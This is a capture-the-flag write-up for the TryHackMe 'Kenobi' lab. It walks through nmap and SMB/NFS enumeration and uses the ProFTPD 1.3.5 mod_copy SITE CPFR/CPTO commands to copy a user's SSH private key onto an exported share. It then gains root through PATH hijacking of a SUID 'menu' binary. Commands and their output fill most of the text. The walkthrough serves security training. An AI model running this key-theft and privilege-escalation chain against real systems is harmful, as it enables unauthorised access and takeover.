TryHackMe - Kenobi
[Task 1] Deploy the vulnerable machine
Setup bash evironment variable
export IP=KENOBI-IP
NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP.
Make sure there is a connection to the THM network
ping $IP -c 3
PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data. 64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms 64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms 64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms --- KENOBI-IP ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2003ms rtt min/avg/max/mdev = 43.110/43.424/43.878/0.328 ms
Scan the machine with
nmap
nmap -sC -sV -vvv -oA $PWD/portScan/nmap-initial $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:38 EDT NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed Initiating Ping Scan at 18:38 Scanning KENOBI-IP [2 ports] Completed Ping Scan at 18:38, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:38 Completed Parallel DNS resolution of 1 host. at 18:38, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 18:38 Scanning KENOBI-IP [1000 ports] Discovered open port 21/tcp on KENOBI-IP Discovered open port 80/tcp on KENOBI-IP Discovered open port 139/tcp on KENOBI-IP Discovered open port 111/tcp on KENOBI-IP Discovered open port 22/tcp on KENOBI-IP Discovered open port 445/tcp on KENOBI-IP Discovered open port 2049/tcp on KENOBI-IP Completed Connect Scan at 18:38, 0.67s elapsed (1000 total ports) Initiating Service scan at 18:38 Scanning 7 services on KENOBI-IP Completed Service scan at 18:38, 11.15s elapsed (7 services on 1 host) NSE: Script scanning KENOBI-IP. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 1.99s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.23s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed Nmap scan report for KENOBI-IP Host is up, received syn-ack (0.044s latency). Scanned at 2020-05-09 18:38:16 EDT for 14s Not shown: 993 closed ports Reason: 993 conn-refused PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ProFTPD 1.3.5 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj | 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8= | 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD | http-robots.txt: 1 disallowed entry |_/admin.html |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind syn-ack 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 34097/tcp mountd | 100005 1,2,3 42895/udp6 mountd | 100005 1,2,3 49712/udp mountd | 100005 1,2,3 54641/tcp6 mountd | 100021 1,3,4 38881/tcp nlockmgr | 100021 1,3,4 42051/tcp6 nlockmgr | 100021 1,3,4 52158/udp nlockmgr | 100021 1,3,4 59194/udp6 nlockmgr | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 2049/tcp open nfs_acl syn-ack 2-3 (RPC #100227) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 9h38m02s, deviation: 2h53m12s, median: 7h58m01s | nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | KENOBI<00> Flags: <unique><active> | KENOBI<03> Flags: <unique><active> | KENOBI<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> | WORKGROUP<1e> Flags: <group><active> | Statistics: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 33364/tcp): CLEAN (Couldn't connect) | Check 2 (port 63681/tcp): CLEAN (Couldn't connect) | Check 3 (port 58242/udp): CLEAN (Failed to receive data) | Check 4 (port 4291/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: kenobi | NetBIOS computer name: KENOBI\x00 | Domain name: \x00 | FQDN: kenobi |_ System time: 2020-05-10T01:36:31-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-10T06:36:31 |_ start_date: N/A NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:38 Completed NSE at 18:38, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
Answer = 8
[Task 2] Enumerating Samba for shares
Use
nmap
to enumerate a machine forSMB
sharesnmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:40 EDT Nmap scan report for KENOBI-IP Host is up (0.042s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\KENOBI-IP\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\KENOBI-IP\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\KENOBI-IP\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> |_smb-enum-users: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
How many shares have been found?
Answer = 3
List files within the
SMB
directorysmbclient //KENOBI-IP/anonymous Enter WORKGROUP\c0g's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 4 06:49:09 2019 .. D 0 Wed Sep 4 06:56:07 2019 log.txt N 12237 Wed Sep 4 06:49:09 2019 9204224 blocks of size 1024. 6877104 blocks available
Answer =
log.txt
Recursively download the
SMB
share.smbget -R smb://KENOBI-IP/anonymous Password for [c0g] connecting to //anonymous/KENOBI-IP: Using workgroup WORKGROUP, user c0g smb://KENOBI-IP/anonymous/log.txt Downloaded 11.95kB in 3 seconds cat log.txt | grep port # Port 21 is the standard FTP port. # Don't use IPv6 support by default. # behaviour of Samba but the option is considered important # Windows Internet Name Serving Support Section: # WINS Support - Tells the NMBD component of Samba to enable its WINS Server # wins support = no # By default, the home directories are exported read-only. Change the
What port is FTP running on? Answer = 21
Enumerate
nfs
share on port111
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 21:34 EDT Nmap scan report for KENOBI-IP Host is up (0.042s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-showmount: |_ /var * Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
What mount can we see?
Answer =
/var
[Task 3] Gain initial access with ProFTPD
Use
netcat
to connect to the machine on theFTP
port.netcat KENOBI-IP 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP ]
Use searchsploit to find exploits for ProFTD
searchsploit ProFTPD 1.3.5
---------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------- --------------------------------- ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py ---------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
What is the version? 1.3.5
Copy Kenobi's private key using
SITE
CPFR
andSITE
CPTO
commands.220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP] 350 File or directory exists, ready for destination name 250 Copy successful
The
/var
directory was a mount previously seen; therefore, Kenobi's private key can be moved to/var/tmp
.Mount the
/var/tmp
directory to the attacking machinesudo mkdir /mnt/kenobiNFS sudo mount KENOBI-IP:/var /mnt/kenobiNFS/ ls -la /mnt/kenobiNFS/ total 56 drwxr-xr-x 14 root root 4096 2019-09-04 2019 . drwxr-xr-x 3 root root 4096 2020-05-09 22:06 .. drwxr-xr-x 2 root root 4096 2019-09-04 2019 backups drwxr-xr-x 9 root root 4096 2019-09-04 2019 cache drwxrwxrwt 2 root root 4096 2019-09-04 2019 crash drwxr-xr-x 40 root root 4096 2019-09-04 2019 lib drwxrwsr-x 2 root staff 4096 2016-04-12 2016 local lrwxrwxrwx 1 root root 9 2019-09-04 2019 lock -> /run/lock drwxrwxr-x 10 root crontab 4096 2019-09-04 2019 log drwxrwsr-x 2 root mail 4096 2019-02-26 2019 mail drwxr-xr-x 2 root root 4096 2019-02-26 2019 opt lrwxrwxrwx 1 root root 4 2019-09-04 2019 run -> /run drwxr-xr-x 2 root root 4096 2019-01-29 2019 snap drwxr-xr-x 5 root root 4096 2019-09-04 2019 spool drwxrwxrwt 6 root root 4096 2020-05-10 05:49 tmp drwxr-xr-x 3 root root 4096 2019-09-04 2019 www
Go to
/var/tmp
and get the private key to login into Kenobi's accountcp /mnt/kenobiNFS/tmp/id_rsa . sudo chmod 600 id_rsa [sudo] password for c0g: ssh -i id_rsa kenobi@KENOBI-IP Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 103 packages can be updated. 65 updates are security updates. Last login: Sun May 10 05:18:41 2020 from 10.11.1.193 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. cat /home/kenobi/user.txt | wc -c 33
[Task 4] Privilege Escalation with Path Variable Manipulation
Search the system for SUID type files
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null /sbin/mount.nfs /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/bin/chfn /usr/bin/newgidmap /usr/bin/pkexec /usr/bin/passwd /usr/bin/newuidmap /usr/bin/gpasswd /usr/bin/menu /usr/bin/sudo /usr/bin/chsh /usr/bin/at /usr/bin/newgrp /bin/umount /bin/fusermount /bin/mount /bin/ping /bin/su /bin/ping6 kenobi@kenobi:~$
What file looks particularly out of the ordinary?
Answer = /usr/bin/menu
Run the binary
kenobi@kenobi:~$ menu *************************************** 1. status check 2. kernel version 3. ifconfig Enter your choice :
How many options appear? Answer = 3
Use
strings
to look for anything human readable within the binarykenobi@kenobi:~$ strings /usr/bin/menu /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid __isoc99_scanf puts __stack_chk_fail printf system __libc_start_main __gmon_start__ GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 UH- AWAVA AUATL []A\A]A^A_ *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : curl -I localhost uname -r ifconfig ......... output shortened
This shows the binary is running without a full path (e.g. not using
/usr/bin/curl
or/usr/bin/uname
).As this file runs as the
root
users privileges, the environment path can be changed to gain aroot
shell.kenobi@kenobi:~$ cd /tmp kenobi@kenobi:/tmp$ echo /bin/sh > curl kenobi@kenobi:/tmp$ chmod 777 curl kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH kenobi@kenobi:/tmp$ /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :1 # id uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) kenobi@kenobi:/tmp$ cat /root/root.txt | wc -c 33